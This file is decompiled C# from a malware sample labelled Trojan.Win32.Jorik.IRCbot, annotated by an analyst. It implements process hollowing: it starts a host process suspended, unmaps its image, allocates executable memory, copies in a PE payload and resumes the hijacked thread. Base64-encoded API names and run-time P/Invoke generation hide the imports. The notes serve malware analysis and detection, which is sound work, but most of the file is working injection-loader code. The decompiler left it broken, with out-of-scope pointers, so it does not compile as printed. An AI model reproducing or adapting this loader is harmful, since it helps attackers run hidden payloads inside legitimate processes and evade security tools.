// Decompiled with JetBrains decompiler
// Type: uqeyrwlquci0gyeo0qjxqcszc
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
//
// ANALYST NOTES (added during review; the code itself is unchanged decompiler output)
// - Provenance: per the path above, this type comes from a sample labelled
//   Trojan.Win32.Jorik.IRCbot in a VirusShare collection. Treat it as a malware artefact.
// - What the type does: it starts a host executable suspended, unmaps and re-allocates memory
//   in that child at the payload's preferred base, copies a PE image from a byte array into it,
//   rewrites the primary thread's context and resumes the thread. Assuming the string helper is
//   a Base64 decoder (see below), this is the process-hollowing pattern (MITRE ATT&CK T1055.012).
// - String hiding: every DLL and export name is passed through
//   ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r, which is not defined in this file. The
//   literals are valid Base64 and decode to the names given in the comments below; presumably the
//   helper is a Base64 decoder. Confirm against that type before relying on the decoded names.
// - Import hiding: no [DllImport] declarations exist. Each native call is built at run time with
//   Reflection.Emit (dynamic assembly "temp", DefinePInvokeMethod), so static import listings of
//   the assembly will not show these APIs.
// - Detection-relevant behaviour visible here: a child created with creation flag 4
//   (CREATE_SUSPENDED), a cross-process unmap of the child's image base, a remote allocation with
//   protection 64 (PAGE_EXECUTE_READWRITE), repeated cross-process writes, a thread-context write
//   followed by a resume, and a new run-only dynamic assembly named "temp" for every native call.
// - Decompiler damage: the decompiler could not scope the four pinned pointers, so every `numPtr`
//   below is ambiguous and the listing does not compile as printed. Buffer identities given in
//   the comments are inferred from buffer sizes and copy order and are marked as such.
using System;
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;

public static class uqeyrwlquci0gyeo0qjxqcszc
{
  // Named constants kept by the compiler. The method body uses the literal values
  // (65543, 4, 12288 = 4096 + 8192, 64, 23117, 17744) rather than these names.
  private const uint CONTEXT_FULL = 65543;
  private const int CREATE_SUSPENDED = 4;
  private const int MEM_COMMIT = 4096;
  private const int MEM_RESERVE = 8192;
  private const int PAGE_EXECUTE_READWRITE = 64;
  private const ushort IMAGE_DOS_SIGNATURE = 23117;
  private const uint IMAGE_NT_SIGNATURE = 17744;

  /// <summary>
  /// Loads the PE image held in <paramref name="exeBuffer"/> into a newly created, suspended
  /// instance of <paramref name="hostProcess"/> and resumes that process's primary thread.
  /// </summary>
  /// <param name="exeBuffer">Raw bytes of the executable image to map into the child.</param>
  /// <param name="hostProcess">Path of the executable started as the host process.</param>
  /// <param name="optionalArguments">
  /// If not null or empty, appended to <paramref name="hostProcess"/> to form the command line.
  /// </param>
  /// <returns>
  /// false if either signature check fails or the process-creation call returns false, otherwise
  /// true. The results of the later native calls are not inspected, so true does not mean that
  /// the remote writes or the context change succeeded.
  /// </returns>
  public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh(
    byte[] exeBuffer,
    string hostProcess,
    string optionalArguments)
  {
    // Scratch buffers. The sizes match 32-bit Windows structures, so the roles below are inferred
    // (TODO confirm against the IL): 40 = one section header, 248 = NT headers, 64 = DOS header,
    // int[4] = process-information block (handles at [0] and [1]), 716 = thread CONTEXT.
    byte[] dst1 = new byte[40];
    byte[] dst2 = new byte[248];
    byte[] dst3 = new byte[64];
    int[] numArray1 = new int[4];
    byte[] numArray2 = new byte[716];
    // The four pins below all decompiled to the same name with empty bodies; every later
    // `numPtr` refers to one of them, but the listing no longer says which.
    fixed (byte* numPtr = &dst1[0])
      ;
    fixed (byte* numPtr = &dst2[0])
      ;
    fixed (byte* numPtr = &dst3[0])
      ;
    fixed (byte* numPtr = &numArray2[0])
      ;
    // Writes 65543 (the CONTEXT_FULL constant) to the start of a pinned buffer, presumably the
    // 716-byte one, i.e. the context-flags field.
    // ISSUE: fixed variable is out of scope
    *(int*) numPtr = 65543;
    // Copy the first 64 bytes of the payload and require the value 23117 (IMAGE_DOS_SIGNATURE).
    // exeBuffer is not length-checked before this or any later copy.
    Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length);
    // ISSUE: fixed variable is out of scope
    if (*(ushort*) numPtr != (ushort) 23117)
      return false;
    // The int at offset 60 is used as the offset of the next header (presumably e_lfanew of dst3).
    // ISSUE: fixed variable is out of scope
    int srcOffset = *(int*) (numPtr + 60);
    // Copy 248 bytes from that offset and require the value 17744 (IMAGE_NT_SIGNATURE).
    Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length);
    // ISSUE: fixed variable is out of scope
    if (*(uint*) numPtr != 17744U)
      return false;
    // Command line: the helper's result for "" unless optional arguments were supplied.
    string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("");
    if (!string.IsNullOrEmpty(optionalArguments))
      str = hostProcess + " " + optionalArguments;
    // Literals decode to "kernel32" / "CreateProcess". The sixth argument is 4 (CREATE_SUSPENDED),
    // so the child is created with its primary thread suspended. The byte[68] is presumably a
    // zeroed startup-info block, and numArray1 receives the handles used by every later call.
    if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="),
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="),
          new Type[10]
          {
            typeof (string),
            typeof (string),
            typeof (IntPtr),
            typeof (IntPtr),
            typeof (bool),
            typeof (int),
            typeof (IntPtr),
            typeof (string),
            typeof (byte[]),
            typeof (int[])
          },
          (object) hostProcess,
          (object) str,
          (object) IntPtr.Zero,
          (object) IntPtr.Zero,
          (object) false,
          (object) 4,
          (object) IntPtr.Zero,
          null,
          (object) new byte[68],
          (object) numArray1))
      return false;
    // num1 is a 32-bit value read at offset 52 of a pinned buffer, presumably the payload's
    // preferred image base taken from dst2. It is used as the remote base address from here on.
    // ISSUE: fixed variable is out of scope
    IntPtr num1 = new IntPtr(*(int*) (numPtr + 52));
    // Literals decode to "ntdll" / "NtUnmapViewOfSection", called with the child's process handle
    // and num1. The status in num2 is never checked.
    int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="),
      new Type[2] { typeof (IntPtr), typeof (IntPtr) },
      (object) (IntPtr) numArray1[0],
      (object) num1);
    // Literals decode to "kernel32" / "VirtualAllocEx". The call allocates in the child at num1
    // with type 12288 (MEM_COMMIT + MEM_RESERVE) and protection 64 (PAGE_EXECUTE_READWRITE); the
    // size is read at offset 80 of a pinned buffer, presumably the image size in dst2.
    // If the call returns zero the method calls itself with the same arguments, discards the
    // result and carries on below with the original handles. Each such retry starts another
    // suspended child, and nothing in this method terminates the earlier ones.
    // ISSUE: fixed variable is out of scope
    if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="),
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="),
          new Type[5]
          {
            typeof (IntPtr),
            typeof (IntPtr),
            typeof (uint),
            typeof (int),
            typeof (int)
          },
          (object) (IntPtr) numArray1[0],
          (object) num1,
          (object) *(uint*) (numPtr + 80),
          (object) 12288,
          (object) 64) == IntPtr.Zero)
      uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments);
    // Literals decode to "ntdll" / "NtWriteVirtualMemory". The source is the start of exeBuffer
    // and the destination is num1 in the child; the length is read at offset 84 of a pinned
    // buffer, presumably the size-of-headers field in dst2.
    fixed (byte* numPtr = &exeBuffer[0])
    {
      // ISSUE: fixed variable is out of scope
      uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
        ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
        ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="),
        new Type[5]
        {
          typeof (IntPtr),
          typeof (IntPtr),
          typeof (IntPtr),
          typeof (uint),
          typeof (IntPtr)
        },
        (object) (IntPtr) numArray1[0],
        (object) num1,
        (object) (IntPtr) (void*) numPtr,
        (object) *(uint*) (numPtr + 84),
        (object) IntPtr.Zero);
    }
    // One iteration per table entry. The count is a ushort at offset 6 of a pinned buffer,
    // presumably the number-of-sections field in dst2.
    // ISSUE: fixed variable is out of scope
    for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index)
    {
      // Read the index-th 40-byte entry that follows the 248-byte header block.
      Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length);
      // Pin exeBuffer at the offset stored at +20 of the entry and write the length stored at +16
      // to (num1 + value at +12) in the child. Presumably these are the entry's raw-data pointer,
      // raw-data size and virtual address. None of them is validated against exeBuffer.Length.
      // ISSUE: fixed variable is out of scope
      fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)])
      {
        // ISSUE: fixed variable is out of scope
        // ISSUE: fixed variable is out of scope
        uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
          ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="),
          new Type[5]
          {
            typeof (IntPtr),
            typeof (IntPtr),
            typeof (IntPtr),
            typeof (uint),
            typeof (IntPtr)
          },
          (object) (IntPtr) numArray1[0],
          (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)),
          (object) (IntPtr) (void*) numPtr,
          (object) *(uint*) (numPtr + 16),
          (object) IntPtr.Zero);
      }
    }
    // Literals decode to "ntdll" / "NtGetContextThread". The call takes the thread handle in
    // numArray1[1] and a pinned buffer, presumably the 716-byte context block.
    // ISSUE: fixed variable is out of scope
    uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"),
      new Type[2] { typeof (IntPtr), typeof (IntPtr) },
      (object) (IntPtr) numArray1[1],
      (object) (IntPtr) (void*) numPtr);
    // A further cross-process write ("ntdll" / "NtWriteVirtualMemory") with length 4. The remote
    // address is the 32-bit value at offset 172 of a pinned buffer and the source argument is
    // num1. Presumably this stores the new image base in the child's process data (TODO confirm
    // the offset and the marshalling of num1 against the IL).
    // ISSUE: fixed variable is out of scope
    uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="),
      new Type[5]
      {
        typeof (IntPtr),
        typeof (IntPtr),
        typeof (IntPtr),
        typeof (int),
        typeof (IntPtr)
      },
      (object) (IntPtr) numArray1[0],
      (object) (IntPtr) (long) *(uint*) (numPtr + 172),
      (object) num1,
      (object) 4,
      (object) IntPtr.Zero);
    // Stores num1 plus the 32-bit value at offset 40 of a pinned buffer into offset 176 of a
    // pinned buffer. Presumably this is image base + entry-point RVA written into the saved
    // thread context (TODO confirm).
    // ISSUE: fixed variable is out of scope
    // ISSUE: fixed variable is out of scope
    *(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40);
    // Literals decode to "ntdll" / "NtSetContextThread" and "ntdll" / "NtResumeThread". Both act
    // on the thread handle in numArray1[1]. num3 and num4 are never read, and neither handle in
    // numArray1 is closed anywhere in this method.
    // ISSUE: fixed variable is out of scope
    int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"),
      new Type[2] { typeof (IntPtr), typeof (IntPtr) },
      (object) (IntPtr) numArray1[1],
      (object) (IntPtr) (void*) numPtr);
    int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt(
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="),
      ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="),
      new Type[2] { typeof (IntPtr), typeof (IntPtr) },
      (object) (IntPtr) numArray1[1],
      (object) IntPtr.Zero);
    return true;
  }

  /// <summary>
  /// Builds a P/Invoke stub at run time for export <paramref name="method"/> of library
  /// <paramref name="name"/> and invokes it once with <paramref name="arguments"/>.
  /// </summary>
  /// <param name="name">Library name passed to DefinePInvokeMethod as the DLL name.</param>
  /// <param name="method">Export name, also used to look the stub up again via GetMethod.</param>
  /// <param name="typeArr">Managed parameter types of the stub.</param>
  /// <param name="arguments">Values passed to the stub through reflection Invoke.</param>
  /// <returns>The native return value cast to TR.</returns>
  // NOTE(review): TR is used as a type, but no type-parameter list is visible on this method or
  // at its call sites, which consume the result as bool, int and IntPtr. Presumably the generic
  // "<TR>" markers were lost when this page was extracted. Confirm against the binary.
  // Every call defines a new run-only dynamic assembly named "temp" and a module whose name is
  // the helper's output for "bW9kdWxl" (Base64 for "module"). Nothing is cached, so one run of
  // the loader emits one dynamic assembly per native call.
  public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt(
    string name,
    string method,
    Type[] typeArr,
    params object[] arguments)
  {
    ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl"));
    // Static, PreserveSig P/Invoke with the Winapi calling convention and ANSI string marshalling.
    moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig);
    // Global functions must be baked before GetMethod can return the stub.
    moduleBuilder.CreateGlobalFunctions();
    return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments);
  }
}